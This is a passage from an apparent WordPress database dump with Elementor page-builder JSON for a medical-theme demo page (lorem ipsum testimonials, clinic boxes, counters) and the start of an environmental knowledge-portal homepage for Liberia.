fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":8},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0.4},\"button_text_color\":\"#333333\",\"background_color\":\"rgba(0,0,0,0)\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"vpd68pg\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"sp1hkvu\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_957412.jpg\",\"id\":145},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"104\",\"height\":\"104\"},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0,0,0,0.2)\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"tfbwu8m\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"title_text\":\"Pediatric Clinic\",\"description_text\":\"Sed lectus. Integer euismod lacus luctus magna. Quisque cursus, metus vitae sem massa mattis\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"wiytuem\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read More\",\"align\":\"center\",\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":8},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0.4},\"button_text_color\":\"#333333\",\"background_color\":\"rgba(0,0,0,0)\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"skqiyik\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fv7id0y\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_369542.jpg\",\"id\":143},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"104\",\"height\":\"104\"},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0,0,0,0.2)\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1fkclio\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"title_text\":\"Dental Clinic\",\"description_text\":\"Ullamcorper. Nulla facilisi. Integer lacinia sollicitudin massa. Cras metus. Sed aliquet risus a id tortor\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"mtrt6oy\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read More\",\"align\":\"center\",\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":8},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0.4},\"button_text_color\":\"#333333\",\"background_color\":\"rgba(0,0,0,0)\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"xm3kst6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Register Now\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_family\":\"Dosis\",\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"background_color\":\"#01aef0\",\"hover_color\":\"#01aef0\",\"button_background_hover_color\":\"rgba(0,0,0,0)\",\"button_hover_border_color\":\"#01aef0\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"border_color\":\"#01aef0\",\"border_radius\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"30\",\"bottom\":\"10\",\"left\":\"30\",\"isLinked\":false},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":12}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"960wyxr\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#01aef0\",\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8dbf01c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"8231wcp\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"b8k6776\",\"elType\":\"widget\",\"settings\":{\"starting_number\":\"\",\"ending_number\":142,\"title\":\"saved hearts\",\"number_color\":\"#ffffff\",\"typography_number_typography\":\"custom\",\"typography_number_font_size\":{\"unit\":\"px\",\"size\":50},\"title_color\":\"#ffffff\",\"typography_title_typography\":\"custom\",\"typography_title_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_title_font_weight\":\"600\",\"typography_title_text_transform\":\"uppercase\",\"typography_title_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"typography_number_font_size_tablet\":{\"unit\":\"px\",\"size\":30},\"typography_title_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"counter\"}],\"isInner\":false},{\"id\":\"ktjw2tm\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"gffdt05\",\"elType\":\"widget\",\"settings\":{\"starting_number\":\"\",\"ending_number\":6424,\"suffix\":\"+\",\"title\":\"happy patients\",\"number_color\":\"#ffffff\",\"typography_number_typography\":\"custom\",\"typography_number_font_size\":{\"unit\":\"px\",\"size\":50},\"title_color\":\"#ffffff\",\"typography_title_typography\":\"custom\",\"typography_title_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_title_font_weight\":\"600\",\"typography_title_text_transform\":\"uppercase\",\"typography_title_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"typography_number_font_size_tablet\":{\"unit\":\"px\",\"size\":30},\"typography_title_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"counter\"}],\"isInner\":false},{\"id\":\"k1ny1cq\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"jegms49\",\"elType\":\"widget\",\"settings\":{\"starting_number\":\"\",\"ending_number\":1382,\"suffix\":\"+\",\"title\":\"doctors number\",\"number_color\":\"#ffffff\",\"typography_number_typography\":\"custom\",\"typography_number_font_size\":{\"unit\":\"px\",\"size\":50},\"title_color\":\"#ffffff\",\"typography_title_typography\":\"custom\",\"typography_title_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_title_font_weight\":\"600\",\"typography_title_text_transform\":\"uppercase\",\"typography_title_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"typography_number_font_size_tablet\":{\"unit\":\"px\",\"size\":30},\"typography_title_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"counter\"}],\"isInner\":false},{\"id\":\"mjm18s4\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"wsyu9mt\",\"elType\":\"widget\",\"settings\":{\"starting_number\":\"\",\"ending_number\":275,\"title\":\"saved lungs\",\"number_color\":\"#ffffff\",\"typography_number_typography\":\"custom\",\"typography_number_font_size\":{\"unit\":\"px\",\"size\":50},\"title_color\":\"#ffffff\",\"typography_title_typography\":\"custom\",\"typography_title_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_title_font_weight\":\"600\",\"typography_title_text_transform\":\"uppercase\",\"typography_title_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"typography_number_font_size_tablet\":{\"unit\":\"px\",\"size\":30},\"typography_title_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"counter\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"t2gvx2f\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_159211.jpg\",\"id\":156},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#364e66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8},\"padding\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ffe3375\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"cq7te54\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"unlkljg\",\"elType\":\"widget\",\"settings\":{\"title\":\"What Our Patients Say\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":1.4}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ayvp0xr\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"weight\":{\"unit\":\"px\",\"size\":6},\"color\":\"#01aef0\",\"width\":{\"unit\":\"px\",\"size\":40},\"align\":\"center\",\"gap\":{\"unit\":\"px\",\"size\":16},\"_css_classes\":\"no-margin\",\"text\":\"Divider\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"rot3ixr\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed<\\/p>\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"gx8goxj\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"deb0197\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"fc8q2qe\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"1gdmbbl\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Saperet periculis principes in vis, est ne minim admodum. Ignota perpetua torquatos id ius, ut consul probatus conceptam est, ea sit graecis singulis. Maiorum pertinacia ea per, has quis euripidis at. Persius civibus eligendi.\",\"testimonial_image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_428339.jpg\",\"id\":153},\"testimonial_name\":\"Mike Wright\",\"testimonial_job\":\"Patient #1\",\"content_content_color\":\"#ffffff\",\"content_typography_typography\":\"custom\",\"content_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"name_text_color\":\"#ffffff\",\"name_typography_typography\":\"custom\",\"name_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"name_typography_font_weight\":\"600\",\"name_typography_text_transform\":\"uppercase\",\"name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"job_text_color\":\"#ffffff\",\"job_typography_typography\":\"custom\",\"job_typography_font_size\":{\"unit\":\"px\",\"size\":12}},\"elements\":[],\"widgetType\":\"testimonial\"},{\"id\":\"eo56seo\",\"elType\":\"widget\",\"settings\":{\"weight\":{\"unit\":\"px\",\"size\":2},\"color\":\"rgba(255,255,255,0.2)\",\"text\":\"Divider\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"y7o9kxz\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Sed tale aeterno saperet ex. Placerat quaestio ea ius, eos vocent euismod ex, alia recusabo signiferumque pro no. Qui mel dictas erroribus. Eros ullum no est, ei nisl wisi ius. Bonorum expetenda et eum. Ius dolor inimicus.\",\"testimonial_image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_324658.jpg\",\"id\":152},\"testimonial_name\":\"Nancy Green\",\"testimonial_job\":\"Patient #3\",\"content_content_color\":\"#ffffff\",\"content_typography_typography\":\"custom\",\"content_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"name_text_color\":\"#ffffff\",\"name_typography_typography\":\"custom\",\"name_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"name_typography_font_weight\":\"600\",\"name_typography_text_transform\":\"uppercase\",\"name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"job_text_color\":\"#ffffff\",\"job_typography_typography\":\"custom\",\"job_typography_font_size\":{\"unit\":\"px\",\"size\":12}},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":true},{\"id\":\"ea8zdxf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"jzgwrdz\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Ad qui facete melius dolores. Elitr invidunt vix ex, agam convenire democritum an mel. Ad per autem dicta consul, te corpora nostrum consulatu quo. An doming quodsi usu, id vis unum facilisi, vivendo nonumes hendrerit.\",\"testimonial_image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_301284.jpg\",\"id\":151},\"testimonial_name\":\"Frances Lopez\",\"testimonial_job\":\"Patient #2\",\"content_content_color\":\"#ffffff\",\"content_typography_typography\":\"custom\",\"content_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"name_text_color\":\"#ffffff\",\"name_typography_typography\":\"custom\",\"name_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"name_typography_font_weight\":\"600\",\"name_typography_text_transform\":\"uppercase\",\"name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"job_text_color\":\"#ffffff\",\"job_typography_typography\":\"custom\",\"job_typography_font_size\":{\"unit\":\"px\",\"size\":12}},\"elements\":[],\"widgetType\":\"testimonial\"},{\"id\":\"7fr075g\",\"elType\":\"widget\",\"settings\":{\"weight\":{\"unit\":\"px\",\"size\":2},\"color\":\"rgba(255,255,255,0.2)\",\"text\":\"Divider\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"6kl9wra\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Morbi in ipsum sit amet pede facilisis laoreet. Donec lacus nunc, viverra nec, blandit vel, egestas et, augue. Vestibulum tincidunt malesuada ultrices enim. Curabitur sit amet mauris. Morbi in dui quis est pulvinar facilisi.\",\"testimonial_image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_91227.jpg\",\"id\":150},\"testimonial_name\":\"Nick Smith\",\"testimonial_job\":\"Patient #4\",\"content_content_color\":\"#ffffff\",\"content_typography_typography\":\"custom\",\"content_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"name_text_color\":\"#ffffff\",\"name_typography_typography\":\"custom\",\"name_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"name_typography_font_weight\":\"600\",\"name_typography_text_transform\":\"uppercase\",\"name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"job_text_color\":\"#ffffff\",\"job_typography_typography\":\"custom\",\"job_typography_font_size\":{\"unit\":\"px\",\"size\":12}},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"yb7q3d9\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2b48461\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"bm6vhpr\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"393qxl0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Latest from blog\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":18}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"uqjuvgf\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"weight\":{\"unit\":\"px\",\"size\":6},\"color\":\"#01aef0\",\"width\":{\"unit\":\"px\",\"size\":40},\"align\":\"center\",\"gap\":{\"unit\":\"px\",\"size\":16},\"_css_classes\":\"no-margin\",\"text\":\"Divider\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"liad1d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"mrc2wel\",\"elType\":\"widget\",\"settings\":{\"items\":\"3\",\"tablet\":\"2\",\"mobile\":\"1\",\"count\":\"6\",\"author\":\"false\",\"cat\":\"false\",\"excerpt_length\":\"15\",\"readmore_text\":\"Learn More\"},\"elements\":[],\"widgetType\":\"oew-blog-carousel\"}],\"isInner\":false}],\"isInner\":false}]'),(3085,398,'_elementor_version','2.7.5'),(3086,398,'_elementor_template_type','wp-page'),(3092,399,'_wp_page_template','default'),(3093,399,'_elementor_edit_mode','builder'),(3094,399,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":880},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_forest_biodiversity.jpg\",\"id\":396},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#364e66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics, Institutions Resources, and Other useful data.<\\/p>\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"search_submit_label\":\"Search\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"All Categories\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"vmjwleh\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"40\",\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3a3bcf4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"ho7i20h\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#01aef0\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"20\",\"bottom\":\"30\",\"left\":\"20\",\"isLinked\":false},\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"xy8zxqm\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-heartbeat\",\"title_text\":\"Cardiac Rehab\",\"description_text\":\"Aenean vulputate viverra odio eget dignissim. Aliquam suscipit titus ipsum velit lacus scelerisque.\",\"primary_color\":\"#005296\",\"icon_size\":{\"unit\":\"px\",\"size\":50},\"icon_padding\":{\"unit\":\"px\",\"size\":26},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_text_transform\":\"uppercase\",\"title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"description_color\":\"#ffffff\"},\"elements\":[],\"widgetType\":\"icon-box\"},{\"id\":\"ze0ehm9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Learn 